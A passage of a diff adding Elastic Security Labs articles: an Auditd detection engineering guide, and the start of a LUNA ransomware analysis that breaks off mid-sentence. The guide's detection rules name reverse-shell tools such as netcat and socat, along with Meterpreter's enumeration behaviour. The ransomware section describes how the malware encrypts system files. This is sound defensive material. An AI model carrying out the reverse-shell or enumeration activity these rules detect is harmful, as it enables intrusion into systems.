+ "document": "---\ntitle: \"Linux detection engineering with Auditd\"\nslug: \"linux-detection-engineering-with-auditd\"\ndate: \"2024-04-09\"\ndescription: \"In this article, learn more about using Auditd and Auditd Manager for detection engineering.\"\nauthor:\n - slug: ruben-groenewoud\nimage: \"Security Labs Images 30.jpg\"\ncategory:\n - slug: detection-science\ntags:\n - slug: linux\n - slug: auditd\n---\n\n## Introduction\n\nUnix and Linux systems operate behind the scenes, quietly underpinning a significant portion of our technological infrastructure. With the increasing complexity of threats targeting these systems, ensuring their security has become more important than ever.\n\nOne of the foundational tools in the arsenal of security detection engineers working within Unix and Linux systems is [Auditd](https://linux.die.net/man/8/auditd). This powerful utility is designed for monitoring and recording system events, providing a detailed audit trail of who did what and when. It acts as a watchdog, patrolling and recording detailed information about system calls, file accesses, and system changes, which are crucial for forensic analysis and real-time monitoring.\n\nThe objective of this article is multifaceted:\n\n 1. We aim to provide additional information regarding Auditd, showcasing its capabilities and the immense power it holds in security detection engineering.\n 2. We will guide you through setting up Auditd on your own systems, tailoring it to meet your specific monitoring needs. By understanding how to create and modify Auditd rules, you will learn how to capture the exact behavior you're interested in monitoring and interpret the resulting logs to create your own detection rules.\n 3. We'll introduce Auditd Manager, an integration tool that enhances Auditd’s utility by simplifying the management of Auditd across systems.\n\nBy the end of this post, you'll not only learn how to employ Auditd Manager to incorporate some of our [pre-built detection rules](https://github.com/elastic/detection-rules/tree/main/rules) into your security strategy, but also gain a comprehensive understanding of Auditd and how to leverage it to build your own detection rules as well.\n\n## Introduction to Auditd\n\nAuditd is a Linux tool designed for monitoring and recording system events to provide a comprehensive audit trail of user activities, system changes, and security access. Auditd operates by hooking into the Linux kernel, capturing detailed information about system calls and other system events as they happen. These events are then logged to a file, providing a timestamped record. Administrators can define rules that specify which events to log, offering the flexibility to focus on specific areas of interest or concern. The logged data can be used for a variety of purposes, from compliance auditing to detailed forensic analysis.\n\n## Auditd setup\n\nTo get started with Auditd, Elastic provides several options:\n\n - [Auditbeat’s Auditd module](https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-auditd.html)\n - [Filebeat’s Auditd module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-auditd.html)\n - [Elastic Agent’s Auditd Logs integration](https://docs.elastic.co/en/integrations/auditd)\n - [Elastic Agent’s Auditd Manager integration](https://docs.elastic.co/integrations/auditd_manager)\n\nIn this article, we will focus on the latter two, leveraging the [Elastic Agent](https://www.elastic.co/elastic-agent) to easily ingest logs into Elasticsearch. If you are new to Elasticsearch you can easily create an [Elastic Cloud Account](https://www.elastic.co/cloud) with a 30-day trial license, or for local testing, you can download The [Elastic Container Project](https://github.com/peasead/elastic-container) and set the license value to trial in the .env file.\n\nFeel free to follow along using Auditbeat or Filebeat - for setup instructions, consult the documentation linked above. As the Auditd Logs integration works by parsing the audit.log file, you are required to install Auditd on the Linux host from which you wish to gather the logs. Depending on the Linux distribution and the package manager of choice, the Auditd package should be installed, and the Auditd service should be started and enabled. For Debian-based distributions:\n\n```\nsudo apt update\nsudo apt install auditd\nsudo systemctl start auditd\nsudo systemctl enable auditd\n```\n\nThe ```/var/log/audit/audit.log``` file should now be populated with Auditd logs. Next, you need to install the Auditd Logs integration, create an agent policy in Fleet with the newly installed integration, and apply the integration to a compatible Elastic Agent with Auditd installed. \n\n\n\n\nThe default settings should suffice for most scenarios. Next, you need to add the integration to an agent policy, and add the agent policy to the Elastic Agents from which you want to harvest data. The Elastic Agent ships the logs to the logs-auditd.log-[namespace] datastream. You can now [create a new data view](https://www.elastic.co/guide/en/kibana/current/data-views.html) to only match our incoming Auditd logs.\n \n\n\n\nYou can now explore the ingested Auditd logs. But as you will quickly notice, Auditd does not log much by default – you must leverage Auditd rules to unlock its full potential.\n\n## Auditd rules\n\nAuditd rules are directives used to specify which system activities to monitor and log, allowing for granular control over the security auditing process. These rules are typically configured in the ```/etc/audit/audit.rules``` file. Auditd rules come in 3 varieties: ```control```, ```file```, and ```syscall```. More information can be found [here](https://linux.die.net/man/7/audit.rules). \n\n### Control type rules\n\nThe control type is, in most cases, used to configure Auditd rather than specifying the events to monitor. By default, the audit rules file contains the following control type settings:\n\n```\n-D\n-b 8192\n-f 1\n--backlog_wait_time 60000\n```\n\n - ```-D```: delete all rules on launch (Auditd parses the rules in the file from top to bottom. Removing all rules on launch ensures a clean configuration).\n - ```-b 8192```: set the maximum amount of existing Audit buffers in the kernel.\n - ```-f 1```: set the failure mode of Auditd to log.\n - ```--backlog_wait_time 60000```: specify the amount of time (in ms) that the audit system will wait if the audit backlog limit is reached before dropping audit records.\n\n### File System Rules\n\nBuilding upon these default control type settings, you can create file system rules, sometimes referred to as watches. These rules allow us to monitor files of interest for read, write, change and execute actions. A typical file system rule would look as follow:\n\n```\n-w [path-to-file] -p [permissions] -k [keyname]\n```\n\n - ```-w```: the path to the file or directory to monitor.\n - ```-p```: any of the read (r), write (w), execute (e) or change (a) permissions.\n - ```-k```: the name of a key identifier that may be used to more easily search through the auditd logs.\n\nIn case you want to monitor the ```/etc/shadow``` file for file reads, writes, and changes, and save any such events with a key named shadow_access, you could setup the following rule:\n\n```\n-w /etc/shadow -p rwa -k shadow_access\n```\n\n### System call rules\n\nAuditd’s true power is revealed when working with its system call rules. Auditd system call rules are configurations that specify which system calls (syscalls) to monitor and log, allowing for detailed tracking of system activity and interactions with the operating system kernel. As each syscall is intercepted and matched to the rule, it is important to leverage this functionality with care by only capturing the syscalls of interest and, when possible, capturing multiple of these syscalls in one rule. A typical syscall rule would look like this:\n\n```\n-a [action],[filter] -S [syscall] -F [field=value] -k [keyname]\n```\n\nYou may leverage the ```-a``` flag followed by ```action,filter``` to choose when an event is logged, where ```action``` can be ```always``` (always create an event) or ```never``` (never create an event).\n\nfilter can be any of:\n\n - ```task```: logs task creation events.\n - ```entry```: logs syscall entry points.\n - ```exit```: logs syscall exits/results.\n - ```user```: logs user-space events.\n - ```exclude```: excludes events from logging.\n\nNext, you have:\n\n - ```-S```: the syscall that you are interested in (name or syscall number).\n - ```-F```: one or more filters to choose what to match against.\n - ```-k```: the key identifier.\n\nWith the information provided above, you should be able to understand the basics of most Auditd rules. For more information and examples of what values can be added to these rules, feel free to read more [here](https://linux.die.net/man/7/audit.rules).\n\nGetting started building and testing a comprehensive and dedicated Auditd rule file for your organization might seem daunting. Luckily, there are some good public rule file examples available on GitHub. A personal favorite template to build upon is [Neo23x0’s](https://github.com/Neo23x0/auditd/blob/master/audit.rules), which is a good balance between visibility and performance. \n\nOne downside of using the Auditd Logs integration is that you manually need to install Auditd on each host that you want to monitor, and apply the rules file manually to each running Auditd instance. This means that every time you want to update the rules file, you will have to update it on all of the hosts. Nowadays, many organizations leverage management tools that can make this process less time consuming. However, Elastic also provides another way of ingesting Auditd logs through the Auditd Manager integration which alleviates the management burden. \n\n## Introduction to Auditd Manager and setup\n\nThe Auditd Manager integration receives audit events from the [Linux Audit Framework](https://github.com/torvalds/linux/blob/master/kernel/audit.c) that is a part of the Linux kernel. This integration establishes a subscription to the kernel to receive the events as they occur. The Linux audit framework can send multiple messages for a single auditable event. For example, a ```rename()``` syscall causes the kernel to send eight separate messages. Each message describes a different aspect of the activity that is occurring (the syscall itself, file paths, current working directory, process title). This integration will combine all of the data from each of the messages into a single event. More information regarding Auditd Manager can be found [here](https://docs.elastic.co/integrations/auditd_manager).\n\nAdditionally, Auditd Manager solves the management burden as it allows centralized management through [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html). An update to the integration will automatically be applied to all Elastic agents that are part of the changed agent policy. \n\nSetting up the Auditd Manager integration is simple. You need to make sure that Auditd is no longer running on our hosts, by stopping and disabling the service.\n\n```\nsudo systemctl stop auditd\nsudo systemctl disable auditd\n```\n\nYou can now remove the Auditd Logs integration from our agent policy, and instead install/add the Auditd Manager integration.\n\n\n\n\nThere are several options available for configuring the integration. Auditd Manager provides us with the option to set the audit config as immutable (similar to setting the ```-e 2``` control-type rule in the Auditd configuration), providing additional security in which unauthorized users cannot change the audit system, making it more difficult to hide malicious activity. \n\nYou can leverage the Resolve IDs functionality to enable the resolution of UIDs and GIDs to their associated names.\n\n\n\n\nFor our Auditd rule management, you can either supply the rules in the Audit rules section, or leverage a rule file and specify the file path to read this file from. The rule format is similar to the rule format for the Auditd Logs integration. However, instead of supplying control flags in our rule file, you can set these options in the integration settings instead.\n\n\n\n\nAuditd Manager automatically purges all existing rules prior to adding any new rules supplied in the configuration, making it unnecessary to specify the ```-D``` flag in the rule file. Additionally, you can set our failure mode to ```silent``` in the settings, and therefore do not need to supply the ```-f``` flag either.\n\n\n\n\nYou can set the backlog limit as well, which would be similar to setting the ```-b``` flag.\n\n\n\n\nThere is also an option for setting the backpressure strategy, equivalent to the ```--backlog_wait_time``` setting.\n\n\n\n\nFinally, check the option to preserve the original event, as this will allow you to analyze the event easier in the future.\n\n\n\n\nYou can now save the integration, and apply it to the agent policy for the hosts from which you would like to receive Auditd logs.\n\n## Auditd rule file troubleshooting\n\nThe rule file provided by Neo23x0 does not work for Auditd Manager by default. To get it to work, you will have to make some minor adjustments such as removing the control type flags, a UID to user conversion for a user that is not present on default systems, or a redundant rule entry. The changes that have to be made will ultimately be unique to your environment.\n\nYou have two ways of identifying the errors that will be generated when copy-pasting an incompatible file into the Auditd Manager integration. You can navigate to the agent that received the policy, and look at the integration input error. You can analyze the errors one by one, and change or remove the conflicting line.\n\n\n\n\nYou can also use the [Discover](https://www.elastic.co/guide/en/kibana/current/discover.html) tab, select our Auditd Manger data view, and filter for events where the ```auditd.warnings``` field exists, and go through the warnings one-by-one.\n\n\n\n\nFor example, you can see that the error states “unknown rule type” , which is related to Auditd not supporting control rules. The “failed to convert user ‘x’ to a numeric ID”, is related to the user not existing on the system. And finally, “rule ‘x’ is a duplicate of ‘x’”, is related to duplicate rules. Now that you removed the conflicting entries, and our agent status is healthy, you can start analyzing some Auditd data!\n\n## Analyzing Auditd Manager events\n\nNow that you have Auditd Manager data available in our Elasticsearch cluster, just like you did before, you can create a dataview for the ```logs-auditd_manager.auditd*``` index to specifically filter this data. Our implemented rule file contains the following entry:\n\n```\n-w /etc/sudoers -p rw -k priv_esc\n```\n\nThis captures read and write actions for the ```/etc/sudoers``` file, and writes these events to a log with the ```priv_esc``` key. Let’s execute the ```cat /etc/sudoers``` command, and analyze the event. Let us first look at some of the fields containing general information.\n\n\n\n\nYou can see that the ```/etc/sudoers``` file was accessed by the ```/usr/bin/cat``` binary through the ```openat()``` syscall. As the file owner and group are ```root```, and the user requesting access to this file is not UID 0 (root), the ```openat()``` syscall failed, which is represented in the log. Finally, you can see the tag that was linked to this specific activity. \n\nDigging a bit deeper, you can identify additional information about the event.\n\n\n\n\nYou can see the process command line that was executed, and which process ID and process parent ID initiated the activity. Additionally, you can see from what architecture the event originated and through which ```tty``` (terminal connected to standard input) the command was executed. \n\nTo understand the a0-3 values, you need to dig deeper into Unix syscalls. You should at this point be aware of what a syscall is, but to be complete, a Unix syscall (system call) is a fundamental interface that allows a program to request a service from the operating system's kernel, such as file operations, process control, or network communications.\n\nLet’s take a look at the ```openat()``` syscall. Consulting the ```open(2)``` man page (source), you see the following information.\n\n\n\n\n```openat()``` is an evolved version of the ```open()``` syscall, allowing for file access relative to a directory file descriptor (```dirfd```). This syscall enables a program to open a file or directory — a crucial operation for many system tasks. You can see that the syscall is part of the standard C library, and is available in ```fcntl.h``` header through the ```#include ``` include statement.\n\nConsulting the manual, you can see the ```openat()``` syscall syntax is as follows:\n\n```\nint openat(int dirfd, const char *pathname, int flags, /* mode_t mode */);\n```\n\n - ```dirfd``` specifies the directory file descriptor.\n - ```*pathname``` is a pointer to the name of the file/directory to be opened.\n - ```flags``` determine the operation mode (e.g., read, write, create, etc.).\n\nReturning to our original event, you are now ready to understand the ```auditd.data.a0-a3``` fields. The ```a0``` to ```a3``` values in an auditd log represent the arguments passed to a syscall. These arguments are crucial for understanding the context and specifics of the syscall's execution. Let's break down how these values relate to ```openat()``` and what they tell us about the attempted operation based on our earlier exploration.\n\n - ```auditd.data.a0``` (```dirfd```): The a0 value, ```ffffff9c```, indicates a special directive, ```AT_FDCWD```, suggesting the operation is relative to the current working directory.\n - ```auditd.data.a1``` (```pathname```): The ```a1``` value, ```7ffd0f81871d```, represents a hexadecimal memory address pointing to the pathname string of the target file or directory. In this case, it refers to an attempt to access the ```/etc/sudoers``` file.\n - ```auditd.data.a2``` (```flags```): Reflected by the ```a2``` value of ```0```, the flags argument specifies the mode in which the file is to be accessed. With ```0``` indicating no special flags were used, it implies a default operation – most likely read-only access.\n - ```auditd.data.a3``` (```mode```): The ```a3``` value, also 0, becomes relevant in contexts where the file is being created, dictating the permissions set on the new file.\n\nBased on the analysis above, you now have a pretty good understanding of how to interpret Auditd Manager events.\n\nA different way of quickly getting an idea of what an Auditd Manager event means is by using Elastic’s built-in [AI Assistant](https://www.elastic.co/guide/en/security/current/security-assistant.html). Let’s execute the ```whoami``` command, and take a look at the ```auditd.messages``` field within the event.\n\n\n\n\nYou can ask the Elastic AI Assistant to do the heavy lifting and analyze the event, after which you only have to consult the syscall manual to make sure that it was correct. Let’s first create a new system prompt, focused on analyzing Auditd logs, somewhat similar to this: \n\n\n\n\nYou can now leverage the newly created system prompt, and paste your Auditd message in there without any additional formatting, and receive the following response:\n\n\n\n\nGenerative AI tools are very useful for receiving a quick explanation of an event. But generative AI can make mistakes, so you should always be cognizant of leveraging AI tools for this type of analysis, and double check what output it generates. Especially when leveraging the output of these tools for detection rule development, as one minor mistake could lead to faulty logic.\n\n## Auditd Manager detection rule examples\n\nAfter reading the previous section, you should now have enough knowledge available to get started analyzing Auditd Manager logs. The current Elastic detection rules rule set mostly leverages the [Elastic Defend integration](https://docs.elastic.co/en/integrations/endpoint), but the number of rules that leverage Auditd is increasing significantly. This section will dive into several detection rules that leverage Auditd, explain the why and try to teach some underused techniques for writing detection rule queries.\n\n### Potential reverse shell via UDP\n\nThe [Potential Reverse Shell via UDP](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_udp_cli_utility_linux.toml) rule aims to identify UDP-based reverse shells. As Elastic Defend does not currently capture UDP traffic, you can leverage Auditd to close this visibility gap. The rule leverages the following logic: \n\n```\nsample by host.id, process.pid, process.parent.pid\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"executed\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n )]\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"socket\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and auditd.data.a1 == \"2\"]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connected-to\" and\n process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and network.direction == \"egress\" and destination.ip != null and\n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n```\n\nThe rule leverages the [sample](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-samples) functionality, which describes and matches a chronologically unordered series of events. This will ensure the sequence also triggers if the events occur in the same millisecond. Additionally, we leverage a whitelisting approach to specify suspicious binaries that are capable of spawning a reverse connection, allowing for a minimized false-positive rate.\n\nWe ensure the capturing of UDP connections by leveraging the Auditd data related to the [```socket()```](https://man7.org/linux/man-pages/man2/socket.2.html) syscall.\n\n\n\n\nWe see that the a0 value represents the domain, ```a1``` represents the type and ```a2``` represents the protocol used. Our rule leverages the ```auditd.data.a1 == \"2\"``` syntax, which translates to the ```SOCK_DGRAM``` type, which is UDP. \n\n\n\n\nFinally, we ensure that we capture only egress network connections from the host and ensure the exclusion of IPv4 and IPv6 loopback addresses, IPv4 link-local and multicast addresses, and sequence the query by ```process.pid``` and ```process.parent.pid``` to make sure the events originate from the same (parent) process. \n\n\n\n\nIf we want to hunt for suspicious processes opening UDP sockets, we can query all socket() syscalls with ```auditd.data.a1 == \"2\"```, count the number of distinct process occurrences, and sort them in an ascending order to find anomalies. To do so, we can leverage this ES|QL query:\n\n```\nFROM logs-*, auditbeat-*\n| EVAL protocol = CASE(\n auditd.data.a1 == \"1\", \"TCP\",\n auditd.data.a1 == \"2\", \"UDP\"\n)\n| WHERE host.os.type == \"linux\" and auditd.data.syscall == \"socket\" and protocol == \"UDP\"\n| STATS process_count = COUNT(process.name), host_count = COUNT(host.name) by process.name, protocol\n| SORT process_count asc\n| LIMIT 100\n```\n\n\n\n\nLooking at the results, we can see quite a few interesting processes pop up, which might be a good starting point for threat hunting purposes. \n\n### Potential Meterpreter reverse shell\n\nAnother interesting type of reverse connections that we leveraged Auditd for is the detection of the [Meterpreter shell](https://docs.rapid7.com/metasploit/manage-meterpreter-and-shell-sessions/), which is a popular reverse shell used within the [Metasploit-Framework](https://www.metasploit.com/). The [Potential Meterpreter Reverse Shell](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_meterpreter_linux.toml) rule leverages Meterpreter’s default host enumeration behavior to detect its presence. \n\n```\nsample by host.id, process.pid, user.id\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n```\n\nWhen Meterpreter spawns, it collects default system information such as the machine, user, and IP routing information by reading specific system files. We can see this behavior when decompiling the Meterpreter payload, as the paths are hardcoded into the binary.\n\n\n\n\nOur detection logic leverages ```auditd.data.a2 == “1b6”```, as this is consistent with the Meterpreter’s behavior. We can find Meterpreter leveraging this specific syscall combination to read files by looking at the way Meterpreter opens file handlers. \n\n\n\n\nJust for informational purposes, some other paths that Meterpreter reads from can be found in the screenshot below.\n\n\n\n\nWe can leverage [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) to analyze a set of Meterpreter reverse shells, and easily find out what file paths are being accessed by all of them. \n\n```\nFROM logs-*, auditbeat-*\n| WHERE host.os.type == \"linux\" and event.action == \"opened-file\" and process.name in (\"shell-x64.elf\", \"JBNhk\", \"reverse.elf\", \"shell.elf\", \"elf\") and auditd.data.a2 == \"1b6\"\n| STATS file_access = COUNT_DISTINCT(process.name) by file.path\n| SORT file_access desc\n| LIMIT 100\n```\n\n\n\n\nIn this example we are only analyzing 5 Meterpreter shells, but using ES|QL we can easily scale this analysis to larger numbers. Based on the information above, we can see that the paths that were selected for the detection rule are present in all five of the samples. \n\nCombining the above logic, we can potentially discover Linux Meterpreter payloads.\n\n\n\n\n### Linux FTP/RDP brute force attack detected\n\nGiven that there are so many different FTP/RDP clients available for Linux, and the authentication logs are not entirely implemented similarly, you can leverage Auditd’s ```auditd.data.terminal``` field to detect different FTP/RDP implementations. Our FTP detection logic looks as follows:\n\n```\nsequence by host.id, auditd.data.addr, related.user with maxspan=3s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and \n auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and auditd.data.addr != null and \n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=5\n\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and \n auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and auditd.data.addr != null and \n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n```\n\nHere, we sequence 5 failed login attempts with 1 successful login attempt on the same host, from the same IP and for the same user. We leverage the [tail](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-pipe-ref.html) feature which works similar to tail in Unix, selecting the last X number of alerts rather than selecting all alerts within the timeframe. This does not affect the SIEM detection rules interface, it is only used for easier readability as brute force attacks can quickly lead to many alerts.\n\n\n\n\nAlthough we are leveraging different FTP tools such as ```vsftpd```, the ```auditd.data.terminal``` entry remains similar across tooling, allowing us to capture a broader range of FTP brute forcing attacks. Our RDP detection rule leverages similar logic:\n\n```\nsequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n```\n\nGiven that ```auditd.data.terminal``` fields from different RDP clients are inconsistent, we can leverage wildcards to capture their authentication events. \n\n\n\n\n### Network connection from binary with RWX memory region\n\nThe [```mprotect()```](https://man7.org/linux/man-pages/man2/mprotect.2.html) system call is used to change the access protections on a region of memory that has already been allocated. This syscall allows a process to modify the permissions of pages in its virtual address space, enabling or disabling permissions such as read, write, and execute for those pages. Our aim with this detection rule is to detect network connections from binaries that have read, write and execute memory region permissions set. Let’s take a look at the syscall.\n\n\n\n\nFor our detection rule logic, the ```prot``` value is most important. You can see that ```prot``` can have the following access flags:\n\n\n\n\nAs stated, ```prot``` is a bitwise OR of the values in the list. So for read, write, and execute permissions, we are looking for an int of:\n\n```\nint prot = PROT_READ | PROT_WRITE | PROT_EXEC;\n```\n\nThis translates to a value of ```0x7``` after bitwising, and therefore we will be looking at an ```auditd.data.a2 == “7”```. We have created two detection rules that leverage this logic - [Unknown Execution of Binary with RWX Memory Region](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml) and [Network Connection from Binary with RWX Memory Region](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml). The detection rules that leverage specific Auditd configurations in order to function, will have a note about what rule to add in their setup guide:\n\n\n\n\nThe prior leverages the [new_terms](https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule) rule type, which allows us to detect previously unknown terms within a specified time window. This allows us to detect binaries with RWX permissions that are being seen on a specific host for the first time, while reducing false positives for binaries that are overly permissive but used on a regular basis.\n\nThe latter leverages the following detection logic:\n\n```\nsample by host.id, process.pid, process.name\n[process where host.os.type == \"linux\" and auditd.data.syscall == \"mprotect\" and auditd.data.a2 == \"7\"]\n[network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and\n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")\n]\n```\n\nWe sample a process being executed with these RWX permissions, after which a network connection (excluding loopback, multicast, and link-local addresses) is initiated.\n\nInterestingly enough, Metasploit often assigns these RWX permissions to specific regions of its generated payloads. For example, one of the events that trigger this detection logic in a testing stack is related to the execution of [Metasploit’s Postgres Payload for Linux](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/postgres/postgres_payload.rb). When analyzing this payload’s source code, you can see that the payload_so function defines the ```PROT_READ```, ```PROT_WRITE``` and ```PROT_EXEC``` flags.\n\n\n\n\nAfter which a specific memory region, with a specific page size of ```0x1000``` is given the RWX access flags in a similar fashion as described earlier. \n\n\n\n\nAfter running the payload, and querying the stack, you can see several hits are returned, which are all related to Metasploit Meterpreter payloads.\n\n\n\n\nFocusing on the Postgres payload that we were analyzing earlier, you can see the exact payload execution path through our [visual event analyzer](https://www.elastic.co/guide/en/security/current/visual-event-analyzer.html). Elastic Security allows any event detected by Elastic Endpoint to be analyzed using a process-based visual analyzer, which shows a graphical timeline of processes that led up to the alert and the events that occurred immediately after. Examining events in the visual event analyzer is useful to determine the origin of potentially malicious activity and other areas in your environment that may be compromised. It also enables security analysts to drill down into all related hosts, processes, and other events to aid in their investigations.\n\n\n\n\nIn the analyzer you can see perl being leveraged to create and populate the jBNhk payload in the /tmp directory (with RWX permissions) and spawning a reverse Meterpreter shell. \n\n## Conclusion\n\nIn this post, we've dived into the world of Auditd, explaining what it is and its purpose. We showed you how to get Auditd up and running, how to funnel those logs into Elasticsearch to boost Unix/Linux visibility and enable you to improve your Linux detection engineering skills. We discussed how to craft Auditd rules to keep an eye on specific activities, and how to make sense of the events that it generates. To make life easier, we introduced Auditd Manager, an integration created by Elastic to take some of the management load off your shoulders. Finally, we wrapped up by exploring various detection rules and some of the research that went into creating them, enabling you to get the most out of this data source.\n\nWe hope you found this guide helpful! Incorporating Auditd into your Unix systems is a smart move for better security visibility. Whether you decide to go with our pre-built detection rules or craft some of your own, Auditd can really strengthen your Unix security game."
+ },
+ "title": "Linux detection engineering with Auditd",
+ "slug": "linux-detection-engineering-with-auditd",
+ "date": "2024-04-09",
+ "description": "In this article, learn more about using Auditd and Auditd Manager for detection engineering.",
+ "author": [
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "Security Labs Images 30.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ {
+ "slug": "linux"
+ },
+ {
+ "slug": "auditd"
+ }
+ ]
+ },
+ "id": "security_labs_content-linux_detection_engineering_with_auditd-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-luna_ransomware_attack_pattern-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-luna_ransomware_attack_pattern-md.json
new file mode 100644
index 00000000000..793e9fbdf40
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-luna_ransomware_attack_pattern-md.json
@@ -0,0 +1,38 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"LUNA Ransomware Attack Pattern Analysis\"\nslug: \"luna-ransomware-attack-pattern\"\ndate: \"2022-08-31\"\nsubtitle: \"LUNA attack pattern and malware observations\"\ndescription: \"In this research publication, we'll explore the LUNA attack pattern — a cross-platform ransomware variant.\"\nauthor:\n - slug: salim-bitam\n - slug: seth-goodwin\n - slug: andrew-pease\n - slug: daniel-stepanic\nimage: \"dark-side-of-moon-flickr-earth-shine-thumbnail.jpeg\"\ncategory:\n - slug: attack-pattern\ntags:\n - luna\n - ref5264\n---\n\n## Key Takeaways\n\n- LUNA is ransomware that achieves cross-platform capabilities through its development in Rust\n- The Windows capabilities are comparable to other ransomware peers\n- The Linux capabilities, while functional, are less elegant than the Windows variant\n\n## Preamble\n\nLUNA Ransomware, which Elastic tracks as REF5264, is a Rust-based ransomware first identified by Kaspersky in [their report](https://securelist.com/luna-black-basta-ransomware/106950/) introducing it in July 2022. Rust as a programming language is known in the developer community for being simpler to implement cross-platform software to work on various target operating systems. It’s able to do this through a convenient cluster of tools that abstract away some operating system peculiarities, likely allowing the malware author to focus more on core functionality.\n\nFrom the Kaspersky report we were able to collect two LUNA Ransomware samples: (1) a Linux ELF binary, and (2) a Windows PE executable.\n\nThis research covers:\n\n- Execution and behavior of each sample\n- Description of the encryption mechanism\n- Comparison across our samples\n- Comparison to other ransomware\n- Detection opportunities\n\n## Execution Chain\n\nIn the following sections, we'll describe both the Linux and Windows execution chains.\n\n### Linux execution\n\nOur Linux sample required an argument to execute. The options were **-file [file]** to encrypt a single file, or **-dir [directory]** to walk and encrypt the contents of a specified directory and drop a ransom note. If executed with no arguments, Linux LUNA returns a help page with instructions to use one of the two available arguments. If executed with both the **-file** and **-dir** arguments (including multiple files or directories), all arguments are used.\n\n\n\nThere are no functional protections against encrypting system directories or files. We were able to demonstrate this through encryption of **/etc**. The execution loop continued as expected until it encrypted the **shadow** and **sudoers** files and the process was unable to verify privileges for further file access. The test machine then became unresponsive and required reverting to a prior snapshot. Encryption of these critical system files prevents further encrypting of privileged files and directories the malware attempts to access.\n\n\n\n\n\nAll encrypted files are appended with a **.Luna** extension, i.e. **/etc/passwd.Luna**. If using the **-dir** flag, a **r\\*\\*** eadme-Luna.txt **ransom note will be created at the root of each encrypted directory as well as subdirectories such as** /etc/readme-Luna.txt **and** /etc/ssl\\readme-Luna.txt **. While there are no ransomware notes dropped when encrypting an individual file using the** -file **flag, the encrypted file is still appended with the**.Luna\\*\\* extension.\n\n> You may notice the backslash instead of a forward slash in the above full path **/etc/ssl\\readme-Luna.txt**. This is an interesting artifact of LUNA hardcoding a \\*\\*\\*\\* to append to subdirectories when building the full path for the ransom note. This behavior is expected and would go unnoticed in a Windows environment, but drew our attention when we saw it in Linux. It does not appear to hinder functionality.\n\n\n\nThe ransom note is embedded in the binary in a Base64 format and placed in the root of the targeted directories.\n\n\n\nThe ransom note contains grammatical and spelling errors, listing two ProtonMail email addresses. ProtonMail is an end-to-end encrypted email service based in Switzerland. ProtonMail is popular with privacy-minded individuals and organizations because it uses client-side encryption to protect email content and user data before they are sent to ProtonMail servers.\n\nThe phrase “All your files were moved to secure storage” may be either a translation error for “encrypted” or an attempt to trick the victim into believing their data has been encrypted and stolen to later be used for extortion. This could also refer to some operation that is to occur before encryption takes place. There is no network connectivity aspect of this malware.\n\nThere is a threat of extortion with the phrase “we can show your real face”, but no extortion site has been 